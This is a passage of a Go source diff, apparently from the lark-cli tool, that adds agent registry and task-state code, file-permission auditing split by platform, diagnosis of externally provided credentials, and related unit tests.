if got := KnownSchemes(); got != "(none)" {
t.Fatalf("an empty registry should return \"(none)\", got %q", got)
}
}
func TestRegisteredSchemesSorted(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
// Register out of order to verify enumeration + sort stability.
Register("gamma", testInfo("gamma", okFactory()))
Register("alpha", testInfo("alpha", okFactory()))
Register("beta", testInfo("beta", okFactory()))
got := RegisteredSchemes()
want := []string{"alpha", "beta", "gamma"}
if !reflect.DeepEqual(got, want) {
t.Fatalf("RegisteredSchemes should enumerate and sort, want %v got %v", want, got)
}
// knownSchemes reuses RegisteredSchemes; verify the comma joining.
if s := KnownSchemes(); s != "alpha, beta, gamma" {
t.Fatalf("knownSchemes should be comma-joined, got %q", s)
}
}
func TestResolveInvalidRef(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
// Missing the <scheme>:<agent_id> separator, so ParseRef errors and Resolve propagates it as-is.
_, err := Resolve("no-colon", Deps{})
if !errors.Is(err, ErrInvalidRef) {
t.Fatalf("an invalid ref should propagate ErrInvalidRef, got %v", err)
}
}
func TestResolveUnknownScheme(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
// The ref is valid but the scheme is unregistered, so the error comes from providerFor.
_, err := Resolve("nosuch:agt_x", Deps{})
if err == nil {
t.Fatal("an unregistered scheme should return an error")
}
if errors.Is(err, ErrInvalidRef) {
t.Fatalf("an unregistered scheme should not be ErrInvalidRef, got %v", err)
}
}
func TestResolveSuccess(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
sentinel := okProvider()
var gotDeps Deps
var gotAgentID string
Register("demo", testInfo("demo", func(deps Deps, agentID string) (*Provider, error) {
gotDeps = deps
gotAgentID = agentID
return sentinel, nil
}))
deps := Deps{}
p, err := Resolve("demo:agt_42", deps)
if err != nil {
t.Fatalf("a valid ref + registered scheme should succeed, got %v", err)
}
if p != sentinel {
t.Fatalf("should return the Provider built by the factory, got %v", p)
}
if gotAgentID != "agt_42" {
t.Fatalf("factory should receive the parsed agentID, got %q", gotAgentID)
}
if gotDeps != deps {
t.Fatalf("factory should receive the passed-in Deps, got %+v", gotDeps)
}
}

26
internal/agent/spi.go Normal file
View File

@@ -0,0 +1,26 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
// IdentityType is the closed set of values for IdentitySpec.Type (validated at
// Register time to guard against typos).
type IdentityType string
const (
IdentityUser IdentityType = "user"
IdentityBot IdentityType = "bot"
)
// IdentitySpec declares a supported identity and its precondition, if any.
type IdentitySpec struct {
Type IdentityType `json:"type"` // IdentityUser | IdentityBot
Precondition string `json:"precondition,omitempty"`
}
// AgentSummary is one discoverable agent in `agent list <scheme>` output.
type AgentSummary struct {
AgentRef string `json:"agent_ref"`
Name string `json:"name"`
Description string `json:"description,omitempty"`
}

35
internal/agent/state.go Normal file
View File

@@ -0,0 +1,35 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
// TaskState is the A2A task state, constant across all providers (9 states).
type TaskState string
const (
StateSubmitted TaskState = "submitted"
StateWorking TaskState = "working"
StateInputRequired TaskState = "input_required"
StateAuthRequired TaskState = "auth_required"
StateCompleted TaskState = "completed"
StateFailed TaskState = "failed"
StateCanceled TaskState = "canceled"
StateRejected TaskState = "rejected"
StateUnknown TaskState = "unknown"
)
// IsTerminal reports whether the task has entered a terminal state.
func (s TaskState) IsTerminal() bool {
switch s {
case StateCompleted, StateFailed, StateCanceled, StateRejected:
return true
default:
return false
}
}
// ShouldStopPolling reports whether polling should stop: terminal state, or
// awaiting additional input / re-authentication.
func (s TaskState) ShouldStopPolling() bool {
return s.IsTerminal() || s == StateInputRequired || s == StateAuthRequired
}

View File

@@ -0,0 +1,34 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import "testing"
func TestIsTerminal(t *testing.T) {
cases := map[TaskState]bool{
StateSubmitted: false, StateWorking: false, StateInputRequired: false,
StateAuthRequired: false, StateCompleted: true, StateFailed: true,
StateCanceled: true, StateRejected: true, StateUnknown: false,
}
for s, want := range cases {
if got := s.IsTerminal(); got != want {
t.Errorf("%s.IsTerminal()=%v want %v", s, got, want)
}
}
}
func TestShouldStopPolling(t *testing.T) {
stop := []TaskState{StateCompleted, StateFailed, StateCanceled, StateRejected, StateInputRequired, StateAuthRequired}
cont := []TaskState{StateSubmitted, StateWorking, StateUnknown}
for _, s := range stop {
if !s.ShouldStopPolling() {
t.Errorf("%s should stop polling", s)
}
}
for _, s := range cont {
if s.ShouldStopPolling() {
t.Errorf("%s should keep polling", s)
}
}
}

View File

@@ -131,31 +131,3 @@ func requireInTrustedDirs(effectivePath string, trustedDirs []string, label stri
}
return fmt.Errorf("%s: path %q is not inside any trusted directory", label, effectivePath)
}
// auditFilePermissions rejects world/group-writable modes (always) and
// world/group-readable modes (unless allowReadableByOthers is true, which
// exec commands typically need for their usual 755 mode).
func auditFilePermissions(effectivePath string, allowReadableByOthers bool, label string) error {
info, err := vfs.Stat(effectivePath)
if err != nil {
return fmt.Errorf("%s: cannot stat %q: %w", label, effectivePath, err)
}
mode := info.Mode().Perm()
if mode&0o002 != 0 {
return fmt.Errorf("%s: path %q is world-writable (mode %04o)", label, effectivePath, mode)
}
if mode&0o020 != 0 {
return fmt.Errorf("%s: path %q is group-writable (mode %04o)", label, effectivePath, mode)
}
if allowReadableByOthers {
return nil
}
if mode&0o004 != 0 {
return fmt.Errorf("%s: path %q is world-readable (mode %04o)", label, effectivePath, mode)
}
if mode&0o040 != 0 {
return fmt.Errorf("%s: path %q is group-readable (mode %04o)", label, effectivePath, mode)
}
return nil
}

View File

@@ -29,3 +29,31 @@ func checkOwnerUID(path, label string) error {
}
return nil
}
// auditFilePermissions rejects world/group-writable modes (always) and
// world/group-readable modes (unless allowReadableByOthers is true, which
// exec commands typically need for their usual 755 mode).
func auditFilePermissions(effectivePath string, allowReadableByOthers bool, label string) error {
info, err := vfs.Stat(effectivePath)
if err != nil {
return fmt.Errorf("%s: cannot stat %q: %w", label, effectivePath, err)
}
mode := info.Mode().Perm()
if mode&0o002 != 0 {
return fmt.Errorf("%s: path %q is world-writable (mode %04o)", label, effectivePath, mode)
}
if mode&0o020 != 0 {
return fmt.Errorf("%s: path %q is group-writable (mode %04o)", label, effectivePath, mode)
}
if allowReadableByOthers {
return nil
}
if mode&0o004 != 0 {
return fmt.Errorf("%s: path %q is world-readable (mode %04o)", label, effectivePath, mode)
}
if mode&0o040 != 0 {
return fmt.Errorf("%s: path %q is group-readable (mode %04o)", label, effectivePath, mode)
}
return nil
}

View File

@@ -5,7 +5,22 @@
package binding
import (
"fmt"
"github.com/larksuite/cli/internal/vfs"
)
// checkOwnerUID is a no-op on Windows where Unix UID semantics don't apply.
func checkOwnerUID(path, label string) error {
return nil
}
// auditFilePermissions skips POSIX permission-bit auditing on Windows because
// Go synthesizes mode bits from file attributes rather than NTFS ACLs.
func auditFilePermissions(effectivePath string, allowReadableByOthers bool, label string) error {
if _, err := vfs.Stat(effectivePath); err != nil {
return fmt.Errorf("%s: cannot stat %q: %w", label, effectivePath, err)
}
return nil
}

View File

@@ -0,0 +1,33 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
//go:build windows
package binding
import (
"os"
"path/filepath"
"testing"
)
func TestAssertSecurePath_WindowsIgnoresSyntheticUnixPermissionBits(t *testing.T) {
dir := t.TempDir()
p := filepath.Join(dir, "secrets-getter.cmd")
if err := os.WriteFile(p, []byte("@echo off\r\n"), 0o600); err != nil {
t.Fatalf("write temp command: %v", err)
}
got, err := AssertSecurePath(AuditParams{
TargetPath: p,
Label: "exec provider command",
AllowInsecurePath: false,
AllowReadableByOthers: true,
})
if err != nil {
t.Fatalf("unexpected error for Windows synthetic mode bits: %v", err)
}
if got != p {
t.Errorf("got %q, want %q", got, p)
}
}

View File

@@ -18,6 +18,9 @@ type IOStreams struct {
Out io.Writer
ErrOut io.Writer
IsTerminal bool
// OutIsTerminal reports whether Out is an interactive terminal. Mirrors
// IsTerminal; computed once in NewIOStreams and assignable directly in tests.
OutIsTerminal bool
// StderrIsTerminal reports whether ErrOut is an interactive terminal.
// Advisory warnings written to stderr (e.g. the proxy notice) gate on this
// so they stay out of non-interactive output (pipes, CI, agent runs).
@@ -27,19 +30,24 @@ type IOStreams struct {
}
// NewIOStreams builds an IOStreams from arbitrary readers/writers.
// IsTerminal / StderrIsTerminal are derived from in's / errOut's underlying
// *os.File, if any; non-file streams (bytes.Buffer, strings.Reader, …) yield
// false.
// IsTerminal / OutIsTerminal / StderrIsTerminal are each derived from the
// underlying *os.File of in / out / errOut respectively; non-file
// readers/writers (bytes.Buffer, strings.Reader, …) yield false.
func NewIOStreams(in io.Reader, out, errOut io.Writer) *IOStreams {
isTerminal := false
if f, ok := in.(*os.File); ok {
isTerminal = term.IsTerminal(int(f.Fd()))
fileIsTerminal := func(v any) bool {
if f, ok := v.(*os.File); ok {
return term.IsTerminal(int(f.Fd()))
}
return false
}
stderrIsTerminal := false
if f, ok := errOut.(*os.File); ok {
stderrIsTerminal = term.IsTerminal(int(f.Fd()))
return &IOStreams{
In: in,
Out: out,
ErrOut: errOut,
IsTerminal: fileIsTerminal(in),
OutIsTerminal: fileIsTerminal(out),
StderrIsTerminal: fileIsTerminal(errOut),
}
return &IOStreams{In: in, Out: out, ErrOut: errOut, IsTerminal: isTerminal, StderrIsTerminal: stderrIsTerminal}
}
// SystemIO creates an IOStreams wired to the process's standard file descriptors.

View File

@@ -0,0 +1,31 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package cmdutil
import (
"bytes"
"os"
"testing"
)
func TestNewIOStreamsTerminalFlagsNonFile(t *testing.T) {
s := NewIOStreams(&bytes.Buffer{}, &bytes.Buffer{}, &bytes.Buffer{})
if s.IsTerminal || s.OutIsTerminal || s.StderrIsTerminal {
t.Errorf("non-file streams must not be terminals: in=%v out=%v err=%v",
s.IsTerminal, s.OutIsTerminal, s.StderrIsTerminal)
}
}
func TestNewIOStreamsTerminalFlagsPipe(t *testing.T) {
r, w, err := os.Pipe()
if err != nil {
t.Fatal(err)
}
defer r.Close()
defer w.Close()
s := NewIOStreams(r, w, w)
if s.OutIsTerminal || s.StderrIsTerminal {
t.Errorf("os.Pipe must not be a terminal: out=%v err=%v", s.OutIsTerminal, s.StderrIsTerminal)
}
}

View File

@@ -13,6 +13,7 @@ import (
"strings"
"time"
extcred "github.com/larksuite/cli/extension/credential"
larkauth "github.com/larksuite/cli/internal/auth"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
@@ -61,12 +62,131 @@ func Diagnose(ctx context.Context, f *cmdutil.Factory, cfg *core.CliConfig, veri
if ctx == nil {
ctx = context.Background()
}
// An external provider mints tokens on demand and blocks interactive auth,
// so the built-in keychain heuristics and "auth login" hints don't apply.
if provider := activeExternalProvider(ctx, f); provider != "" {
return diagnoseExternal(ctx, f, cfg, provider, verify)
}
return Result{
Bot: diagnoseBot(ctx, f, cfg, verify),
User: diagnoseUser(ctx, f, cfg, verify),
}
}
// activeExternalProvider returns the active extension provider name, or "".
// An error degrades to the built-in path: an unreachable provider would already
// have failed the f.Config() that produced cfg.
func activeExternalProvider(ctx context.Context, f *cmdutil.Factory) string {
if f == nil || f.Credential == nil {
return ""
}
name, err := f.Credential.ActiveExtensionProviderName(ctx)
if err != nil {
return ""
}
return name
}
func diagnoseExternal(ctx context.Context, f *cmdutil.Factory, cfg *core.CliConfig, provider string, verify bool) Result {
if cfg == nil || cfg.AppID == "" {
notConfigured := Identity{
Status: StatusNotConfigured,
Message: "not configured (missing app config)",
Hint: externalCredentialHint(provider),
}
return Result{Bot: notConfigured, User: notConfigured}
}
// SupportedIdentities == 0 is "unspecified" — treat as both, per CanBot.
ids := extcred.IdentitySupport(cfg.SupportedIdentities)
supportsBot := cfg.SupportedIdentities == 0 || ids.Has(extcred.SupportsBot)
supportsUser := cfg.SupportedIdentities == 0 || ids.Has(extcred.SupportsUser)
return Result{
Bot: diagnoseExternalBot(ctx, f, cfg, provider, supportsBot, verify),
User: diagnoseExternalUser(ctx, f, cfg, provider, supportsUser, verify),
}
}
func diagnoseExternalBot(ctx context.Context, f *cmdutil.Factory, cfg *core.CliConfig, provider string, supported, verify bool) Identity {
if !supported {
return notProvidedExternally("Bot", provider)
}
id := Identity{Status: StatusReady, Available: true, Message: "Bot identity: ready (provided by " + provider + ")"}
if !verify {
return id
}
token, err := resolveBotToken(ctx, f, cfg)
if err != nil {
return externalVerifyFailed(id, "Bot", provider, err)
}
info, err := fetchBotInfo(ctx, f, cfg, token)
if err != nil {
return externalVerifyFailed(id, "Bot", provider, err)
}
id.Verified = boolPtr(true)
id.OpenID = info.OpenID
id.AppName = info.AppName
return id
}
func diagnoseExternalUser(ctx context.Context, f *cmdutil.Factory, cfg *core.CliConfig, provider string, supported, verify bool) Identity {
if !supported {
return notProvidedExternally("User", provider)
}
// enrichUserInfo populates UserOpenId only after the provider returns and
// verifies a UAT (and clears it on failure), so a resolved open id is the
// external analogue of a keychain token being present.
if cfg.UserOpenId == "" {
return Identity{
Status: StatusMissing,
Message: "User identity: not signed in via credential source " + provider,
Hint: externalCredentialHint(provider),
}
}
id := Identity{
Status: StatusReady,
Available: true,
TokenStatus: StatusReady,
UserName: cfg.UserName,
OpenID: cfg.UserOpenId,
Message: "User identity: ready (provided by " + provider + ")",
}
if !verify {
return id
}
if _, err := f.Credential.ResolveToken(ctx, credential.NewTokenSpec(core.AsUser, cfg.AppID)); err != nil {
return externalVerifyFailed(id, "User", provider, err)
}
id.Verified = boolPtr(true)
return id
}
func notProvidedExternally(label, provider string) Identity {
return Identity{
Status: StatusNotConfigured,
Message: label + " identity: not provided by credential source " + provider,
Hint: externalCredentialHint(provider),
}
}
// externalVerifyFailed flips id to verify-failed, keeping any identity fields
// (open id, user name) already resolved before the probe.
func externalVerifyFailed(id Identity, label, provider string, err error) Identity {
id.Available = false
id.Verified = boolPtr(false)
id.Status = StatusVerifyFailed
id.TokenStatus = ""
id.Message = label + " identity: verify failed: " + err.Error()
id.Hint = externalCredentialHint(provider)
return id
}
// externalCredentialHint reports the constraint, not a remediation: the
// identity is the provider's to manage, not lark-cli's to fix. What to do about
// it is the caller's call — there may be no user to ask.
func externalCredentialHint(provider string) string {
return fmt.Sprintf("managed by the external credential provider %q and cannot be configured via lark-cli", provider)
}
func diagnoseBot(ctx context.Context, f *cmdutil.Factory, cfg *core.CliConfig, verify bool) Identity {
if cfg == nil || cfg.AppID == "" {
return Identity{

View File

@@ -10,9 +10,11 @@ import (
"testing"
"time"
extcred "github.com/larksuite/cli/extension/credential"
larkauth "github.com/larksuite/cli/internal/auth"
"github.com/larksuite/cli/internal/cmdutil"
"github.com/larksuite/cli/internal/core"
"github.com/larksuite/cli/internal/credential"
"github.com/larksuite/cli/internal/httpmock"
"github.com/zalando/go-keyring"
)
@@ -348,3 +350,136 @@ func TestDiagnose_UserIdentityNeedsRefresh(t *testing.T) {
t.Fatalf("token status = %q, want needs_refresh", got.User.TokenStatus)
}
}
// fakeExtProvider is a minimal credential.extcred.Provider for exercising the
// external-credential diagnosis path. account makes the provider "active";
// token (when set) satisfies ResolveToken during verify.
type fakeExtProvider struct {
name string
account *extcred.Account
token *extcred.Token
}
func (p *fakeExtProvider) Name() string { return p.name }
func (p *fakeExtProvider) ResolveAccount(context.Context) (*extcred.Account, error) {
return p.account, nil
}
func (p *fakeExtProvider) ResolveToken(context.Context, extcred.TokenSpec) (*extcred.Token, error) {
return p.token, nil
}
func externalFactory(prov *fakeExtProvider, cfg *core.CliConfig) *cmdutil.Factory {
cred := credential.NewCredentialProvider(
[]extcred.Provider{prov}, nil, nil,
func() (*http.Client, error) { return nil, nil },
)
return &cmdutil.Factory{
Config: func() (*core.CliConfig, error) { return cfg, nil },
Credential: cred,
IOStreams: &cmdutil.IOStreams{},
}
}
// assertExternalHint locks the contract that an external-provider hint never
// points at interactive commands blocked under an external provider.
func assertExternalHint(t *testing.T, hint string) {
t.Helper()
if hint == "" {
t.Fatalf("hint empty, want external guidance")
}
for _, blocked := range []string{"auth login", "config --help"} {
if strings.Contains(hint, blocked) {
t.Fatalf("hint %q must not point at %q (blocked under external provider)", hint, blocked)
}
}
if !strings.Contains(hint, "external") {
t.Fatalf("hint %q should explain credentials are external", hint)
}
}
func TestDiagnose_External_UserReady(t *testing.T) {
cfg := &core.CliConfig{AppID: "cli_x", Brand: core.BrandFeishu, SupportedIdentities: uint8(extcred.SupportsAll), UserOpenId: "ou_x", UserName: "Alice"}
f := externalFactory(&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: "cli_x"}}, cfg)
got := Diagnose(context.Background(), f, cfg, false)
// The bug this guards: the built-in path read the keychain (empty under an
// external provider) and reported the user as missing. Now availability
// follows the resolved account, so a signed-in user reads as ready.
if !got.User.Available || got.User.Status != StatusReady || got.User.TokenStatus != StatusReady {
t.Fatalf("user = %#v, want ready/available", got.User)
}
if got.User.OpenID != "ou_x" || got.User.UserName != "Alice" {
t.Fatalf("user identity = %#v", got.User)
}
if got.User.Hint != "" {
t.Fatalf("hint = %q, want empty when available", got.User.Hint)
}
if !got.Bot.Available || got.Bot.Status != StatusReady {
t.Fatalf("bot = %#v, want ready/available", got.Bot)
}
}
func TestDiagnose_External_UserNotSignedIn(t *testing.T) {
cfg := &core.CliConfig{AppID: "cli_x", Brand: core.BrandFeishu, SupportedIdentities: uint8(extcred.SupportsAll)}
f := externalFactory(&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: "cli_x"}}, cfg)
got := Diagnose(context.Background(), f, cfg, false)
if got.User.Available || got.User.Status != StatusMissing {
t.Fatalf("user = %#v, want missing/unavailable", got.User)
}
assertExternalHint(t, got.User.Hint)
}
func TestDiagnose_External_BotOnly(t *testing.T) {
cfg := &core.CliConfig{AppID: "cli_x", Brand: core.BrandFeishu, SupportedIdentities: uint8(extcred.SupportsBot), UserOpenId: "ou_x"}
f := externalFactory(&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: "cli_x"}}, cfg)
got := Diagnose(context.Background(), f, cfg, false)
if !got.Bot.Available || got.Bot.Status != StatusReady {
t.Fatalf("bot = %#v, want ready/available", got.Bot)
}
// Provider declares bot-only: user is unavailable even though an open id is
// present, and the hint is external (not "auth login").
if got.User.Available || got.User.Status != StatusNotConfigured {
t.Fatalf("user = %#v, want not_configured/unavailable", got.User)
}
assertExternalHint(t, got.User.Hint)
}
func TestDiagnose_External_UserOnly(t *testing.T) {
cfg := &core.CliConfig{AppID: "cli_x", Brand: core.BrandLark, SupportedIdentities: uint8(extcred.SupportsUser), UserOpenId: "ou_x", UserName: "Bob"}
f := externalFactory(&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: "cli_x"}}, cfg)
got := Diagnose(context.Background(), f, cfg, false)
if !got.User.Available || got.User.Status != StatusReady {
t.Fatalf("user = %#v, want ready/available", got.User)
}
if got.Bot.Available || got.Bot.Status != StatusNotConfigured {
t.Fatalf("bot = %#v, want not_configured/unavailable", got.Bot)
}
assertExternalHint(t, got.Bot.Hint)
}
func TestDiagnose_External_VerifyUserResolvesToken(t *testing.T) {
cfg := &core.CliConfig{AppID: "cli_x", Brand: core.BrandFeishu, SupportedIdentities: uint8(extcred.SupportsUser), UserOpenId: "ou_x", UserName: "Alice"}
f := externalFactory(&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: "cli_x"}, token: &extcred.Token{Value: "ext-uat"}}, cfg)
got := Diagnose(context.Background(), f, cfg, true)
if !got.User.Available || got.User.Verified == nil || !*got.User.Verified {
t.Fatalf("user = %#v, want available and verified", got.User)
}
}
func TestDiagnose_External_VerifyUserTokenUnavailable(t *testing.T) {
cfg := &core.CliConfig{AppID: "cli_x", Brand: core.BrandFeishu, SupportedIdentities: uint8(extcred.SupportsUser), UserOpenId: "ou_x"}
f := externalFactory(&fakeExtProvider{name: "corp-sso", account: &extcred.Account{AppID: "cli_x"}}, cfg)
got := Diagnose(context.Background(), f, cfg, true)
if got.User.Available || got.User.Status != StatusVerifyFailed {
t.Fatalf("user = %#v, want verify_failed/unavailable", got.User)
}
if got.User.Verified == nil || *got.User.Verified {
t.Fatalf("verified = %v, want false", got.User.Verified)
}
assertExternalHint(t, got.User.Hint)
}

View File

@@ -5,30 +5,39 @@ package meta
import "encoding/json"
// Affordance is the hand-authored usage guidance overlaid on a method: when to
// use it, when not to, prerequisites, few-shot examples, and related methods.
// It is the single typed model of the affordance shape; the envelope renderer
// and the command help both parse through ParsedAffordance so the vocabulary
// is defined once. The JSON tags double as the envelope's wire shape.
// Affordance is the typed usage guidance overlaid on a method. It is the single
// model the envelope renderer and the command help both parse, so the
// vocabulary is defined once; the JSON tags double as the envelope wire shape.
// Skills entries are skill names (or name/path) rendered as runnable
// `lark-cli skills read <entry>` pointers.
type Affordance struct {
UseWhen []string `json:"use_when,omitempty"`
DoNotUseWhen []string `json:"do_not_use_when,omitempty"`
Prerequisites []string `json:"prerequisites,omitempty"`
Examples []AffordanceCase `json:"examples,omitempty"`
Related []string `json:"related,omitempty"`
UseWhen []string `json:"use_when,omitempty"`
AvoidWhen []string `json:"avoid_when,omitempty"`
Prerequisites []string `json:"prerequisites,omitempty"`
Tips []string `json:"tips,omitempty"`
Examples []AffordanceCase `json:"examples,omitempty"`
Extensions []AffordanceSection `json:"extensions,omitempty"`
Related []string `json:"related,omitempty"`
Skills []string `json:"skills,omitempty"`
}
// AffordanceCase is one few-shot example: a one-line description and a
// ready-to-run command.
// AffordanceCase is one few-shot example: a description and a ready-to-run command.
type AffordanceCase struct {
Description string `json:"description"`
Description string `json:"description,omitempty"`
Command string `json:"command"`
}
// ParsedAffordance decodes the method's raw affordance overlay into the typed
// Affordance. ok is false when the method carries no affordance, the JSON is
// malformed, or every section is empty — so callers can treat "no guidance"
// uniformly.
// AffordanceSection is a custom guidance section: any heading beyond the
// standard four (Avoid when / Prerequisites / Tips / Examples) flows through
// here with its label preserved, so authors can add sections without code
// changes.
type AffordanceSection struct {
Label string `json:"label"`
Items []string `json:"items,omitempty"`
}
// ParsedAffordance decodes the method's overlay. ok is false when it is absent,
// malformed, or wholly empty — callers treat all three as "no guidance".
func (m Method) ParsedAffordance() (Affordance, bool) {
if len(m.Affordance) == 0 {
return Affordance{}, false
@@ -37,7 +46,7 @@ func (m Method) ParsedAffordance() (Affordance, bool) {
if json.Unmarshal(m.Affordance, &a) != nil {
return Affordance{}, false
}
if len(a.UseWhen) == 0 && len(a.DoNotUseWhen) == 0 && len(a.Prerequisites) == 0 && len(a.Examples) == 0 && len(a.Related) == 0 {
if len(a.UseWhen) == 0 && len(a.AvoidWhen) == 0 && len(a.Prerequisites) == 0 && len(a.Tips) == 0 && len(a.Examples) == 0 && len(a.Extensions) == 0 && len(a.Related) == 0 && len(a.Skills) == 0 {
return Affordance{}, false
}
return a, true

View File

@@ -19,7 +19,7 @@ func TestMethod_ParsedAffordance(t *testing.T) {
notOK := map[string]string{
"empty payload": ``,
"empty object": `{}`,
"all empty arrays": `{"use_when":[],"do_not_use_when":[],"prerequisites":[],"examples":[],"related":[]}`,
"all empty arrays": `{"use_when":[],"avoid_when":[],"prerequisites":[],"tips":[],"examples":[],"related":[]}`,
"malformed string": `"not an object"`,
"malformed number": `42`,
"nested type mismatch": `{"examples":"should be a list"}`,
@@ -35,8 +35,9 @@ func TestMethod_ParsedAffordance(t *testing.T) {
// Populated affordance parses with all fields.
raw := `{
"use_when": ["需要拿到当前用户的主日历 ID"],
"do_not_use_when": ["已知具体 calendar_id"],
"avoid_when": ["已知具体 calendar_id"],
"prerequisites": ["user 身份登录"],
"tips": ["主日历的 calendar_id 即当前用户的 union_id"],
"examples": [{"description":"获取主日历","command":"lark-cli calendar calendars primary"}],
"related": ["calendars.list"]
}`
@@ -47,10 +48,22 @@ func TestMethod_ParsedAffordance(t *testing.T) {
if len(a.UseWhen) != 1 || a.UseWhen[0] != "需要拿到当前用户的主日历 ID" {
t.Errorf("UseWhen = %v", a.UseWhen)
}
if len(a.Tips) != 1 || a.Tips[0] != "主日历的 calendar_id 即当前用户的 union_id" {
t.Errorf("Tips = %v", a.Tips)
}
if len(a.Examples) != 1 || a.Examples[0].Description != "获取主日历" || a.Examples[0].Command != "lark-cli calendar calendars primary" {
t.Errorf("Examples = %+v", a.Examples)
}
if len(a.Related) != 1 || a.Related[0] != "calendars.list" {
t.Errorf("Related = %v", a.Related)
}
// A method whose only guidance is Tips still parses as populated.
tipsOnly, ok := (Method{Affordance: json.RawMessage(`{"tips":["先调用 list 拿到 id"]}`)}).ParsedAffordance()
if !ok {
t.Fatal("ParsedAffordance with only tips ok=false, want populated")
}
if len(tipsOnly.Tips) != 1 || tipsOnly.Tips[0] != "先调用 list 拿到 id" {
t.Errorf("Tips = %v", tipsOnly.Tips)
}
}

View File

@@ -113,7 +113,8 @@ type EnumOption struct {
}
// EnumOptions returns the field's allowed values paired with their descriptions
// — from enum, or from options when enum is absent — coerced to the canonical
// — from enum (with descriptions backfilled from options when the field carries
// both forms), or from options when enum is absent — coerced to the canonical
// type and ordered: numeric and boolean values are sorted; string values keep
// source order (which can encode priority). Uncoercible literals are dropped.
// Returns nil when the field declares no enum constraint.
@@ -122,9 +123,14 @@ func (f Field) EnumOptions() []EnumOption {
var out []EnumOption
switch {
case len(f.Enum) > 0:
// key by raw literal so enum "1" and option 1 align across JSON types
desc := make(map[string]string, len(f.Options))
for _, o := range f.Options {
desc[fmt.Sprintf("%v", o.Value)] = o.Description
}
for _, e := range f.Enum {
if v, ok := coerceLiteral(ct, e); ok {
out = append(out, EnumOption{Value: v})
out = append(out, EnumOption{Value: v, Description: desc[fmt.Sprintf("%v", e)]})
}
}
case len(f.Options) > 0:

View File

@@ -80,6 +80,39 @@ func TestField_EnumOptions(t *testing.T) {
}
}
func TestField_EnumOptions_BothEnumAndOptions(t *testing.T) {
// enum is the value set; descriptions backfilled from options, empty where absent
f := Field{Type: "string", Enum: []any{"1", "2", "3", "4", "6"}, Options: []Option{
{Value: "1", Description: "from"},
{Value: "2", Description: "to"},
{Value: "6", Description: "subject"},
}}
want := []EnumOption{
{Value: "1", Description: "from"},
{Value: "2", Description: "to"},
{Value: "3", Description: ""},
{Value: "4", Description: ""},
{Value: "6", Description: "subject"},
}
if got := f.EnumOptions(); !reflect.DeepEqual(got, want) {
t.Errorf("EnumOptions(enum+options) = %+v, want %+v", got, want)
}
// enum values stored as strings match option values stored as numbers
fi := Field{Type: "integer", Enum: []any{"10", "2", "1"}, Options: []Option{
{Value: 1, Description: "one"},
{Value: 2, Description: "two"},
}}
wantI := []EnumOption{
{Value: int64(1), Description: "one"},
{Value: int64(2), Description: "two"},
{Value: int64(10), Description: ""},
}
if got := fi.EnumOptions(); !reflect.DeepEqual(got, wantI) {
t.Errorf("EnumOptions(integer enum+options) = %+v, want %+v", got, wantI)
}
}
func TestField_Enum_NumberAndBoolean(t *testing.T) {
// number: string-stored floats coerced to float64 and numerically sorted
if got := (Field{Type: "number", Enum: []any{"2.5", "1.5", "10"}}).EnumValues(); !reflect.DeepEqual(got, []any{1.5, 2.5, float64(10)}) {

View File

@@ -15,8 +15,20 @@ type Envelope struct {
// Meta carries optional metadata in envelope responses.
type Meta struct {
Count int `json:"count,omitempty"`
Rollback string `json:"rollback,omitempty"`
Count int `json:"count,omitempty"`
Rollback string `json:"rollback,omitempty"`
Next []NextAction `json:"next,omitempty"`
}
// NextAction is a typed "suggested next command" that an AI caller can execute
// directly.
type NextAction struct {
Label string `json:"label"`
Command string `json:"command"`
// Template, when true, marks a Command that contains <...> placeholders and
// must be fully substituted by the caller before execution; it is not
// directly executable as-is. Directly executable commands omit the field.
Template bool `json:"template,omitempty"`
}
// PendingNotice, if set, returns system-level notices to inject as the

View File

@@ -0,0 +1,214 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package output
import (
"encoding/json"
"testing"
)
// marshalMeta marshals m and fails the test on error, returning the JSON bytes.
func marshalMeta(t *testing.T, m *Meta) []byte {
t.Helper()
b, err := json.Marshal(m)
if err != nil {
t.Fatalf("json.Marshal(%#v) error = %v", m, err)
}
return b
}
// unmarshalMap unmarshals b into a generic map and fails the test on error.
func unmarshalMap(t *testing.T, b []byte) map[string]interface{} {
t.Helper()
var got map[string]interface{}
if err := json.Unmarshal(b, &got); err != nil {
t.Fatalf("json.Unmarshal(%s) error = %v", b, err)
}
return got
}
func TestMetaNextSerialization_NonEmptyRoundTrips(t *testing.T) {
m := &Meta{Next: []NextAction{{Label: "poll", Command: "lark-cli agent task get example:x t1"}}}
got := unmarshalMap(t, marshalMeta(t, m))
rawNext, ok := got["next"]
if !ok {
t.Fatalf("expected \"next\" key, got %#v", got)
}
next, ok := rawNext.([]interface{})
if !ok {
t.Fatalf("next type = %T, want array", rawNext)
}
if len(next) != 1 {
t.Fatalf("len(next) = %d, want 1", len(next))
}
action, ok := next[0].(map[string]interface{})
if !ok {
t.Fatalf("next[0] type = %T, want object", next[0])
}
if action["label"] != "poll" {
t.Errorf("next[0].label = %v, want poll", action["label"])
}
if action["command"] != "lark-cli agent task get example:x t1" {
t.Errorf("next[0].command = %v, want the poll command", action["command"])
}
}
func TestMetaNextSerialization_NilOmitted(t *testing.T) {
got := unmarshalMap(t, marshalMeta(t, &Meta{Count: 1}))
if _, ok := got["next"]; ok {
t.Errorf("nil Next must be omitted, got %#v", got)
}
if got["count"] != float64(1) {
t.Errorf("count = %v, want 1", got["count"])
}
}
